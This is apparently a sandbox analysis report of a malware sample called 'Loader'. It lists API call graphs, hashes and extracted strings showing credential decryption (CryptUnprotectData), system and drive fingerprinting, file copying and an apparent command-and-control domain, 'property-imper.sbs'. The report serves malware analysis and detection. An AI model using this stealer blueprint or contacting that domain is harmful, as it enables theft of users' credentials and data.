                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
                                                                                              • String ID: CD$CD
                                                                                              • API String ID: 2144476180-4090438138
                                                                                              • Opcode ID: b14cfd66160c302888386a67acff454336d782a597d593cb50f6adb731ed3606
                                                                                              • Instruction ID: 3a15ae023be90ec834df06274781fb463d2b6bac0c405ef2ae4273b571795b98
                                                                                              • Opcode Fuzzy Hash: b14cfd66160c302888386a67acff454336d782a597d593cb50f6adb731ed3606
                                                                                              • Instruction Fuzzy Hash: DC015EB0D002189FCF18EF69D8418AEBBF9FF48344B50941EE815A7340DB34DA45CB90
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CommandLine
                                                                                              • String ID: H%}
                                                                                              • API String ID: 3253501508-1200609292
                                                                                              • Opcode ID: d395047c01938574b027d42ecda4e3a52ec4cfa9a44a3bf97586b3989664ae5e
                                                                                              • Instruction ID: 63507c0659055778c5af4204de37a1e7a7386e1db2b88a93e532a0be2683ec4d
                                                                                              • Opcode Fuzzy Hash: d395047c01938574b027d42ecda4e3a52ec4cfa9a44a3bf97586b3989664ae5e
                                                                                              • Instruction Fuzzy Hash: 37B048B88462009F8B80CF22A8880447AA4AB883023A0806A9A29A2321E73400CE9B20

                                                                                              Execution Graph

                                                                                              Execution Coverage:5.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:37%
                                                                                              Total number of Nodes:235
                                                                                              Total number of Limit Nodes:14
                                                                                              execution_graph 21761 408bc0 21762 408bcf 21761->21762 21763 408bd7 SHGetSpecialFolderPathW 21762->21763 21764 408dab ExitProcess 21762->21764 21765 408bed 21763->21765 21766 408bf5 GetCurrentThreadId GetCurrentProcessId 21765->21766 21767 408da6 21765->21767 21769 408c21 GetForegroundWindow 21766->21769 21770 408c1d 21766->21770 21776 43fd80 FreeLibrary 21767->21776 21771 408c61 21769->21771 21770->21769 21771->21767 21775 40cc90 CoInitializeEx 21771->21775 21776->21764 21777 42ff02 21783 441920 21777->21783 21780 42ffdb GetComputerNameExA 21782 430030 21780->21782 21781 42ff60 21781->21780 21781->21781 21784 42ff12 GetComputerNameExA 21783->21784 21784->21781 21785 426143 21786 42614b 21785->21786 21803 4424d0 21786->21803 21788 42644d 21807 424480 21788->21807 21790 4262b1 21790->21788 21790->21790 21791 426426 GetLogicalDrives 21790->21791 21801 426561 21790->21801 21792 4424d0 LdrInitializeThunk 21791->21792 21793 42643c 21792->21793 21793->21788 21794 426712 21793->21794 21793->21801 21794->21794 21796 4268c0 21794->21796 21798 426b01 21794->21798 21794->21801 21825 442f20 RtlFreeHeap LdrInitializeThunk 21794->21825 21819 421f60 21796->21819 21826 442c30 21798->21826 21805 4424f0 21803->21805 21804 44264e 21804->21790 21805->21804 21838 43fe80 LdrInitializeThunk 21805->21838 21839 442310 21807->21839 21809 424d34 21809->21801 21810 4244c0 21810->21809 21816 4245ac 21810->21816 21843 43fe80 LdrInitializeThunk 21810->21843 21812 424c88 21813 43d390 RtlFreeHeap 21812->21813 21814 424c94 21813->21814 21814->21809 21849 43fe80 LdrInitializeThunk 21814->21849 21816->21812 21844 43fe80 LdrInitializeThunk 21816->21844 21845 43d390 21816->21845 21824 421f70 21819->21824 21820 422034 21820->21801 21821 4424d0 LdrInitializeThunk 21822 422057 21821->21822 21822->21820 21822->21822 21823 424480 2 API calls 21822->21823 21823->21820 21824->21820 21824->21821 21824->21822 21825->21794 21827 442c50 21826->21827 21830 442cbe 21827->21830 21851 43fe80 LdrInitializeThunk 21827->21851 21828 426b32 21828->21801 21834 442af0 21828->21834 21830->21828 21833 442ddf 21830->21833 21852 43fe80 LdrInitializeThunk 21830->21852 21831 43d390 RtlFreeHeap 21831->21828 21833->21831 21835 442b10 21834->21835 21836 442bff 21835->21836 21853 43fe80 LdrInitializeThunk 21835->21853 21836->21801 21838->21804 21840 442330 21839->21840 21840->21840 21841 44247e 21840->21841 21850 43fe80 LdrInitializeThunk 21840->21850 21841->21810 21843->21810 21844->21816 21846 43d415 21845->21846 21847 43d3a8 RtlFreeHeap 21845->21847 21846->21816 21847->21846 21849->21814 21850->21841 21851->21830 21852->21833 21853->21836 21854 40ccc3 CoInitializeSecurity 21855 440a47 21856 440a70 21855->21856 21856->21856 21858 440abe 21856->21858 21862 43fe80 LdrInitializeThunk 21856->21862 21861 43fe80 LdrInitializeThunk 21858->21861 21860 440bbb 21861->21860 21862->21858 21863 438bc8 21864 441920 21863->21864 21865 438be0 GetUserDefaultUILanguage 21864->21865 21866 438c08 21865->21866 21867 424090 21868 4240f2 21867->21868 21869 42409e 21867->21869 21871 4241b0 21869->21871 21872 4241c0 21871->21872 21872->21872 21873 4424d0 LdrInitializeThunk 21872->21873 21874 4242bf 21873->21874 21876 40dfa0 21877 40dfc0 21876->21877 21879 40e02e 21877->21879 21935 43fe80 LdrInitializeThunk 21877->21935 21881 40e0fe 21879->21881 21936 43fe80 LdrInitializeThunk 21879->21936 21892 426760 21881->21892 21883 40e463 21902 426960 21883->21902 21885 40e483 21914 429680 21885->21914 21889 40e4b5 21937 436300 6 API calls 21889->21937 21891 40e507 21895 426712 21892->21895 21894 4268c0 21896 421f60 2 API calls 21894->21896 21895->21892 21895->21894 21897 426b01 21895->21897 21900 4266f4 21895->21900 21938 442f20 RtlFreeHeap LdrInitializeThunk 21895->21938 21896->21900 21898 442c30 2 API calls 21897->21898 21899 426b32 21898->21899 21899->21900 21901 442af0 LdrInitializeThunk 21899->21901 21900->21883 21901->21900 21903 42696e 21902->21903 21904 442af0 LdrInitializeThunk 21903->21904 21909 426712 21904->21909 21906 4266f4 21906->21885 21907 4268c0 21910 421f60 2 API calls 21907->21910 21908 426b01 21911 442c30 2 API calls 21908->21911 21909->21906 21909->21907 21909->21908 21939 442f20 RtlFreeHeap LdrInitializeThunk 21909->21939 21910->21906 21912 426b32 21911->21912 21912->21906 21913 442af0 LdrInitializeThunk 21912->21913 21913->21906 21915 4296b0 21914->21915 21918 42971e 21915->21918 21940 43fe80 LdrInitializeThunk 21915->21940 21916 40e4ac 21922 429a00 21916->21922 21918->21916 21921 42982e 21918->21921 21941 43fe80 LdrInitializeThunk 21918->21941 21919 43d390 RtlFreeHeap 21919->21916 21921->21919 21942 429a20 RtlFreeHeap LdrInitializeThunk 21922->21942 21924 429a14 21924->21889 21925 429a09 21925->21924 21926 43b690 RtlFreeHeap LdrInitializeThunk 21925->21926 21934 42a238 21926->21934 21927 42a461 21928 442310 LdrInitializeThunk 21927->21928 21932 42a478 21928->21932 21929 4426a0 LdrInitializeThunk 21929->21932 21930 42a457 CopyFileW 21930->21927 21931 42a272 21931->21889 21932->21929 21932->21931 21933 442790 LdrInitializeThunk 21932->21933 21933->21932 21934->21927 21934->21930 21934->21931 21934->21932 21935->21879 21936->21881 21937->21891 21938->21895 21939->21909 21940->21918 21941->21921 21943 40e521 21948 4364f0 21943->21948 21945 40e527 21946 40e536 CoUninitialize 21945->21946 21947 40e560 21946->21947 21949 436525 GetSystemMetrics GetSystemMetrics 21948->21949 21950 436568 21949->21950 21951 4406e6 21952 4406c1 21951->21952 21954 4406fa 21951->21954 21952->21952 21953 44085e 21954->21953 21956 43fe80 LdrInitializeThunk 21954->21956 21956->21953 21957 42fe20 21959 42fe3f 21957->21959 21958 42fedb FreeLibrary 21959->21958 21959->21959 21960 43fda0 21961 43fe56 21960->21961 21962 43fe4b 21960->21962 21963 43fdcb RtlReAllocateHeap 21960->21963 21964 43fdbd 21960->21964 21965 43d390 RtlFreeHeap 21961->21965 21963->21962 21964->21961 21964->21963 21965->21962 21967 43d420 21968 43d450 21967->21968 21970 43d4ce 21968->21970 21975 43fe80 LdrInitializeThunk 21968->21975 21972 43d6d1 21970->21972 21974 43d5ce 21970->21974 21976 43fe80 LdrInitializeThunk 21970->21976 21971 43d390 RtlFreeHeap 21971->21972 21974->21971 21975->21970 21976->21974 21977 440222 21978 440250 21977->21978 21980 44028e 21978->21980 21984 43fe80 LdrInitializeThunk 21978->21984 21983 43fe80 LdrInitializeThunk 21980->21983 21982 44034d 21983->21982 21984->21980 21985 4408a3 21986 4408d0 21985->21986 21988 44090e 21986->21988 21989 43fe80 LdrInitializeThunk 21986->21989 21989->21988 21990 40e328 21991 40e350 21990->21991 21991->21991 21992 40e3bd 21991->21992 21994 43fe80 LdrInitializeThunk 21991->21994 21994->21992 21995 430a2d 21996 430a70 21995->21996 21997 430bc5 GetPhysicallyInstalledSystemMemory 21996->21997 21998 430be9 21997->21998 21999 430f73 22000 430f7d 21999->22000 22003 43a860 22000->22003 22005 43a86e 22003->22005 22004 43a957 22008 430f8b 22004->22008 22009 43aa55 22004->22009 22011 43fe80 LdrInitializeThunk 22004->22011 22005->22004 22012 43fe80 LdrInitializeThunk 22005->22012 22009->22008 22013 43fe80 LdrInitializeThunk 22009->22013 22011->22004 22012->22005 22013->22009 22014 40ccf5 22015 40cd10 22014->22015 22018 43abd0 22015->22018 22017 40cd53 22019 43ac30 CoCreateInstance 22018->22019 22021 43acc3 SysAllocString 22019->22021 22022 43b288 22019->22022 22025 43ad7d 22021->22025 22024 43b29c GetVolumeInformationW 22022->22024 22034 43b2ba 22024->22034 22026 43ad85 CoSetProxyBlanket 22025->22026 22027 43b274 SysFreeString 22025->22027 22028 43ada5 SysAllocString 22026->22028 22029 43b26a 22026->22029 22027->22022 22031 43ae90 22028->22031 22029->22027 22031->22031 22032 43aeee SysAllocString 22031->22032 22036 43af17 22032->22036 22033 43b258 SysFreeString SysFreeString 22033->22029 22034->22017 22035 43b24a 22035->22033 22036->22033 22036->22035 22037 43af63 VariantInit 22036->22037 22039 43afc0 22037->22039 22038 43b239 VariantClear 22038->22035 22039->22038 22045 43d37b 22046 43d381 RtlAllocateHeap 22045->22046 22047 44097c GetForegroundWindow 22051 442100 22047->22051 22049 440988 GetForegroundWindow 22050 440997 22049->22050 22052 442110 22051->22052 22052->22049 22053 41daf8 22055 41db00 22053->22055 22054 41dca8 CryptUnprotectData 22055->22054 22056 40d63b 22058 40d6d0 22056->22058 22057 40d74e 22058->22057 22060 43fe80 LdrInitializeThunk 22058->22060 22060->22057 22066 4318bc CoSetProxyBlanket

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4364f0-4365dc GetSystemMetrics * 2 6 4365e3-4369bd 0->6
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: MetricsSystem
                                                                                              • String ID: $+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$+nC$0lC$]rC$kmC$oC$rC
                                                                                              • API String ID: 4116985748-1796909086
                                                                                              • Opcode ID: 695a188e879577bb38cc3fb94df02416cc24b95f9cb868aafc78c35ea99807e5
                                                                                              • Instruction ID: ef683bf15187f25c91d4ff366112e881d127302a524faee56687ba3d4eda8675
                                                                                              • Opcode Fuzzy Hash: 695a188e879577bb38cc3fb94df02416cc24b95f9cb868aafc78c35ea99807e5
                                                                                              • Instruction Fuzzy Hash: 78B15CB04993858FE7B0DF14C58879ABBF1BBC5308F50892EE5988B650CBB95458CF4B

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 9 43abd0-43ac28 10 43ac30-43ac44 9->10 10->10 11 43ac46-43ac62 10->11 13 43ac64 11->13 14 43ac6f-43acbd CoCreateInstance 11->14 13->14 15 43acc3-43ad01 14->15 16 43b28c-43b2b8 call 441920 GetVolumeInformationW 14->16 17 43ad10-43ad4b 15->17 21 43b2ba 16->21 22 43b2bc-43b2df call 420eb0 16->22 17->17 19 43ad4d-43ad7f SysAllocString 17->19 26 43ad85-43ad9f CoSetProxyBlanket 19->26 27 43b274-43b288 SysFreeString 19->27 21->22 28 43b2e0-43b2e8 22->28 29 43ada5-43adc3 26->29 30 43b26a-43b270 26->30 27->16 28->28 31 43b2ea-43b2ec 28->31 32 43add0-43adfd 29->32 30->27 34 43b2fe-43b32d call 420eb0 31->34 35 43b2ee-43b2fb call 408470 31->35 32->32 36 43adff-43ae83 SysAllocString 32->36 43 43b330-43b338 34->43 35->34 39 43ae90-43aeec 36->39 39->39 42 43aeee-43af1d SysAllocString 39->42 48 43af23-43af49 42->48 49 43b258-43b267 SysFreeString * 2 42->49 43->43 44 43b33a-43b33c 43->44 46 43b34e-43b37d call 420eb0 44->46 47 43b33e-43b34b call 408470 44->47 57 43b380-43b388 46->57 47->46 55 43b24a-43b254 48->55 56 43af4f-43af52 48->56 49->30 55->49 56->55 58 43af58-43af5d 56->58 57->57 59 43b38a-43b38c 57->59 58->55 60 43af63-43afb8 VariantInit 58->60 62 43b39e-43b3cb call 420eb0 59->62 63 43b38e-43b39b call 408470 59->63 64 43afc0-43affe 60->64 70 43b3d0-43b3d8 62->70 63->62 64->64 67 43b000-43b012 64->67 71 43b016-43b01c 67->71 70->70 72 43b3da-43b3dc 70->72 73 43b022-43b02b 71->73 74 43b239-43b246 VariantClear 71->74 75 43b3ee-43b3f5 72->75 76 43b3de-43b3eb call 408470 72->76 73->74 77 43b031-43b042 73->77 74->55 76->75 80 43b044-43b049 77->80 81 43b07d 77->81 83 43b05c-43b060 80->83 82 43b07f-43b09b call 4083f0 81->82 92 43b0a1-43b0ab 82->92 93 43b1e8-43b1f9 82->93 85 43b062-43b06b 83->85 86 43b050 83->86 89 43b072-43b076 85->89 90 43b06d-43b070 85->90 88 43b051-43b05a 86->88 88->82 88->83 89->88 91 43b078-43b07b 89->91 90->88 91->88 92->93 94 43b0b1-43b0b9 92->94 95 43b200-43b20f 93->95 96 43b1fb 93->96 97 43b0c0-43b0d0 94->97 98 43b211 95->98 99 43b216-43b236 call 408420 call 408400 95->99 96->95 100 43b0d2-43b0db 97->100 101 43b0e0-43b0e6 97->101 98->99 99->74 103 43b190-43b194 100->103 104 43b10b-43b117 101->104 105 43b0e8-43b0eb 101->105 108 43b196-43b19c 103->108 110 43b1a8-43b1b0 104->110 111 43b11d-43b120 104->111 105->104 109 43b0ed-43b106 105->109 108->93 113 43b19e-43b1a0 108->113 109->103 114 43b1b2-43b1b6 110->114 115 43b1b8-43b1bf 110->115 111->110 116 43b126-43b18f 111->116 113->97 117 43b1a6 113->117 114->108 118 43b1c1-43b1e2 115->118 119 43b1e4-43b1e6 115->119 116->103 117->93 118->103 119->103
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(00445678,00000000,00000001,00445668,00000000), ref: 0043ACB5
                                                                                              • SysAllocString.OLEAUT32(21F727F6), ref: 0043AD52
                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043AD97
                                                                                              • SysAllocString.OLEAUT32(43B341B7), ref: 0043AE04
                                                                                              • SysAllocString.OLEAUT32(3FFB398F), ref: 0043AEF3
                                                                                              • VariantInit.OLEAUT32(?), ref: 0043AF6B
                                                                                              • SysFreeString.OLEAUT32(?), ref: 0043B262
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0043B265
                                                                                              • SysFreeString.OLEAUT32(?), ref: 0043B278
                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,83518165,00000000,00000000,00000000,00000000), ref: 0043B2B4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                                              • String ID: 03$5Ue$C$\$c>]9$;5
                                                                                              • API String ID: 2247799857-450591797
                                                                                              • Opcode ID: c62c0b5c6604f79cf466f149234fed715cee0b101b19fe022c6bf8fbec3b9f7d
                                                                                              • Instruction ID: 9ac7187ad6772f8ca7c49875a9e35ef196dc4b4ce2e76fefba59f5e0202edd75
                                                                                              • Opcode Fuzzy Hash: c62c0b5c6604f79cf466f149234fed715cee0b101b19fe022c6bf8fbec3b9f7d
                                                                                              • Instruction Fuzzy Hash: AD221F72A083009BD724CF24C845B5FBBE6EF89354F148A2EE5959B381D778E905CBC6

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 120 426143-426149 121 426152 120->121 122 42614b-426150 120->122 123 426155-42617e call 4083f0 121->123 122->123 127 4261a0 123->127 128 426185 123->128 129 42618b-426194 call 408400 123->129 130 4261a8-4261b9 123->130 127->130 128->129 129->127 131 4261c2 130->131 132 4261bb-4261c0 130->132 134 4261c4-42620f call 4083f0 131->134 132->134 138 426210-426248 134->138 138->138 139 42624a-426252 138->139 140 426271-42627e 139->140 141 426254-426259 139->141 143 426280-426284 140->143 144 4262a1-4262ac call 4424d0 140->144 142 426260-42626f 141->142 142->140 142->142 146 426290-42629f 143->146 147 4262b1-4262b9 144->147 146->144 146->146 148 4262d0-4262dd 147->148 149 4262c0-4262c7 147->149 150 426465-42651b 147->150 151 42645f 147->151 152 42656c-42658f 147->152 153 42644d-426457 147->153 155 4262e6 148->155 156 4262df-4262e4 148->156 149->148 157 426520-42654a 150->157 151->150 154 426590-4265c6 152->154 153->151 154->154 158 4265c8-426652 154->158 159 4262ed-42639f call 4083f0 155->159 156->159 157->157 160 42654c-426564 call 424480 157->160 161 426660-4266c7 158->161 168 4263a0-4263c8 159->168 160->152 161->161 164 4266c9-4266ec call 424310 161->164 173 4266f4 164->173 168->168 170 4263ca-4263d2 168->170 171 4263f1-4263fe 170->171 172 4263d4-4263db 170->172 175 426423 171->175 176 426400-426407 171->176 174 4263e0-4263ef 172->174 181 4266fa-426702 call 408400 173->181 174->171 174->174 178 426426-426446 GetLogicalDrives call 4424d0 175->178 177 426410-42641f 176->177 177->177 179 426421 177->179 178->151 178->152 178->153 178->173 178->181 184 426722-42672b call 408400 178->184 185 426745-42674b call 408400 178->185 186 426705-426711 178->186 187 42674e-4267ef call 408400 178->187 188 426712 178->188 189 426730-426736 call 408400 178->189 190 42673f 178->190 191 42671c 178->191 179->178 181->186 184->189 185->187 203 4267f0-426815 187->203 188->191 189->190 190->185 191->184 203->203 204 426817-42685f 203->204 206 426860-426874 204->206 206->206 207 426876-426880 206->207 208 4268c0-4268c2 207->208 209 426b01-426b0c 207->209 210 426956-42695d 207->210 211 426aa6-426abb 207->211 212 426887-42688c 207->212 213 4268ca-4268ff 207->213 214 426a4a-426a71 call 442f20 207->214 215 42694b-426954 call 408400 207->215 216 426a78-426a7a 207->216 217 426a7f-426a9f 207->217 208->213 220 426b13-426b3a call 4083f0 call 442c30 209->220 221 426b0e 209->221 211->173 211->181 211->184 211->185 211->186 211->187 211->188 211->189 211->190 211->191 211->208 211->209 211->210 211->211 211->212 211->213 211->214 211->215 211->216 211->217 223 426895 212->223 224 42688e-426893 212->224 222 426900-426930 213->222 214->209 214->211 214->216 214->217 215->210 219 4288d2-4288dc 216->219 217->209 217->211 239 426b50-426b6e call 442af0 220->239 240 426b80-426d52 220->240 241 426b41 220->241 242 426b75 220->242 221->220 222->222 227 426932-426943 call 421f60 222->227 229 426898-4268b9 call 4083f0 223->229 224->229 227->215 229->208 229->209 229->210 229->211 229->213 229->214 229->215 229->216 229->217 239->240 239->242 244 426d60-426dab 240->244 241->239 242->240 244->244 246 426dad-426dd7 244->246 246->219
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !om$<=$DC$CE$G&I$YW$wy${}
                                                                                              • API String ID: 0-2763546839
                                                                                              • Opcode ID: 1ec7d2cd2ced37879bb809c14a9de7203252ef3870e02d5b54f6eab801d4aca2
                                                                                              • Instruction ID: 9a8044de7778d0d6d466e22f449d8050ee6d137ba66a9443c1d672f421d2d162
                                                                                              • Opcode Fuzzy Hash: 1ec7d2cd2ced37879bb809c14a9de7203252ef3870e02d5b54f6eab801d4aca2
                                                                                              • Instruction Fuzzy Hash: D3E1CBB5608350DFD3109F55E88262BBBF0EB81308F55896DF8858B352EB78D905CB9B

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 247 40e521-40e559 call 4364f0 call 409990 CoUninitialize 252 40e560-40e593 247->252 252->252 253 40e595-40e5b8 252->253 254 40e5c0-40e5ef 253->254 254->254 255 40e5f1-40e659 254->255 256 40e660-40e6a2 255->256 256->256 257 40e6a4-40e6b5 256->257 258 40e6b7-40e6c5 257->258 259 40e6db-40e6e3 257->259 260 40e6d0-40e6d9 258->260 261 40e6e5-40e6e9 259->261 262 40e6fd 259->262 260->259 260->260 263 40e6f0-40e6f9 261->263 264 40e700-40e70d 262->264 263->263 265 40e6fb 263->265 266 40e72b-40e733 264->266 267 40e70f-40e716 264->267 265->264 269 40e735-40e736 266->269 270 40e74b-40e755 266->270 268 40e720-40e729 267->268 268->266 268->268 271 40e740-40e749 269->271 272 40e757-40e75b 270->272 273 40e76b-40e777 270->273 271->270 271->271 276 40e760-40e769 272->276 274 40e791-40e8c5 273->274 275 40e779-40e77b 273->275 278 40e8d0-40e8f1 274->278 277 40e780-40e78d 275->277 276->273 276->276 277->277 279 40e78f 277->279 278->278 280 40e8f3-40e917 278->280 279->274 281 40e920-40e944 280->281 281->281 282 40e946-40e992 call 40b980 281->282
                                                                                              APIs
                                                                                                • Part of subcall function 004364F0: GetSystemMetrics.USER32 ref: 00436539
                                                                                                • Part of subcall function 004364F0: GetSystemMetrics.USER32 ref: 00436549
                                                                                              • CoUninitialize.COMBASE ref: 0040E536
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: MetricsSystem$Uninitialize
                                                                                              • String ID: .'&!$2[eu$:[eu$KO$OR$T,$TR$WXOL$property-imper.sbs
                                                                                              • API String ID: 1128523136-3222354490
                                                                                              • Opcode ID: 6056e9c3a1a709be540547e0af84ba5085c585010615bd6174658fee07c01520
                                                                                              • Instruction ID: ba0f01aa7e83229bb13a9e541d3439331ec7a98e269949aeb6ce0a6fb8c5a6f1
                                                                                              • Opcode Fuzzy Hash: 6056e9c3a1a709be540547e0af84ba5085c585010615bd6174658fee07c01520
                                                                                              • Instruction Fuzzy Hash: 74A1CDB540C3D18AD335CF2584907EBBBE1AFA6304F188E6DD0DA6B282D7794509CB97

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 422 408bc0-408bd1 call 43e890 425 408bd7-408bef SHGetSpecialFolderPathW call 4384e0 422->425 426 408dab-408dad ExitProcess 422->426 429 408bf5-408c1b GetCurrentThreadId GetCurrentProcessId 425->429 430 408da6 call 43fd80 425->430 432 408c21-408c5b GetForegroundWindow 429->432 433 408c1d-408c1f 429->433 430->426 434 408c61-408d54 432->434 435 408d82-408d9a call 409ea0 432->435 433->432 436 408d56-408d58 434->436 437 408d5a-408d80 434->437 435->430 440 408d9c call 40cc90 435->440 436->437 437->435 442 408da1 call 40b950 440->442 442->430
                                                                                              APIs
                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408BE2
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00408BF5
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00408BFD
                                                                                              • GetForegroundWindow.USER32 ref: 00408C53
                                                                                              • ExitProcess.KERNEL32 ref: 00408DAD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                              • String ID: HE"
                                                                                              • API String ID: 4063528623-1746803108
                                                                                              • Opcode ID: 04d3ee208cf0cb548e8304bb321ac6dda18581d560b4c082a51554ef1d5b82b4
                                                                                              • Instruction ID: f68291361565261d7299c916201e88e4482c51f1048bdf67861fca6b21c14acd
                                                                                              • Opcode Fuzzy Hash: 04d3ee208cf0cb548e8304bb321ac6dda18581d560b4c082a51554ef1d5b82b4
                                                                                              • Instruction Fuzzy Hash: 05514677B443144BD718EEAACC8635AB6C69FD8314F0E813EA8C8E73D1EE789C054284

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 452 41f580-41f59d 453 41f5c0-41f5e3 452->453 454 41f613-41f623 452->454 455 41f5a4-41f5b9 452->455 456 41f62a-41f65b 452->456 457 41f5ea-41f60c call 41fcb0 452->457 453->453 453->454 453->456 453->457 454->453 454->454 454->456 454->457 455->453 455->454 455->456 455->457 459 41f660-41f672 456->459 457->453 457->454 459->459 461 41f674-41f681 call 419760 459->461 463 41f686-41f6f3 461->463 464 41f700-41f71f 463->464 464->464 465 41f721-41f771 call 419760 464->465 468 41f780-41f7ae 465->468 468->468 469 41f7b0-41f834 call 419760 468->469 472 41f840-41f861 469->472 472->472 473 41f863-41f8aa call 419760 472->473 476 41f8b0-41f8ff 473->476 476->476 477 41f901-41f927 call 419760 476->477 480 41fc80-41fc86 call 408400 477->480 481 41fca0 477->481 482 41fca2-41fca9 477->482 483 41fc62 477->483 484 41fc68-41fc71 call 408400 477->484 485 41fc4d-41fc53 call 408400 477->485 486 41fc5c 477->486 487 41fc8f-41fc9f 477->487 488 41f92e-41f936 477->488 480->487 483->484 484->480 485->486 486->483 487->481 491 41f940-41f949 488->491 491->491 495 41f94b-41f94e 491->495 497 41f950-41f959 495->497 498 41f95b-41f95f 495->498 499 41f962-41f9d9 call 4083f0 497->499 498->499 502 41f9e0-41fa04 499->502 502->502 503 41fa06-41fa13 502->503 504 41fa32-41fa43 503->504 505 41fa15-41fa1a 503->505 507 41fa61-41fa6f 504->507 508 41fa45-41fa49 504->508 506 41fa20-41fa30 505->506 506->504 506->506 510 41fa70-41fa79 507->510 509 41fa50-41fa5f 508->509 509->507 509->509 510->510 511 41fa7b-41fa83 510->511 512 41fa90-41fa99 511->512 512->512 513 41fa9b-41faa7 512->513 514 41fab0-41fab2 513->514 515 41faa9-41faae 513->515 516 41fab9-41facd call 4083f0 514->516 515->516 519 41faf2-41fb31 516->519 520 41facf-41fad6 516->520 522 41fb40-41fb72 519->522 521 41fae0-41faf0 520->521 521->519 521->521 522->522 523 41fb74-41fb7d 522->523 524 41fba3 523->524 525 41fb7f-41fb86 523->525 527 41fba7-41fbb4 524->527 526 41fb90-41fb9f 525->526 526->526 528 41fba1 526->528 529 41fbd1-41fbea 527->529 530 41fbb6-41fbba 527->530 528->527 531 41fbf0-41fc23 529->531 532 41fbc0-41fbcf 530->532 531->531 533 41fc25-41fc45 call 424310 531->533 532->529 532->532 533->485
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1882506593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $%$,A$KV$P[$Y[$]_
                                                                                              • API String ID: 0-2045548196
                                                                                              • Opcode ID: 2db452f1b7869ae9aa98cb25e4805c0568b342052c689d752716c494a3c11a0a
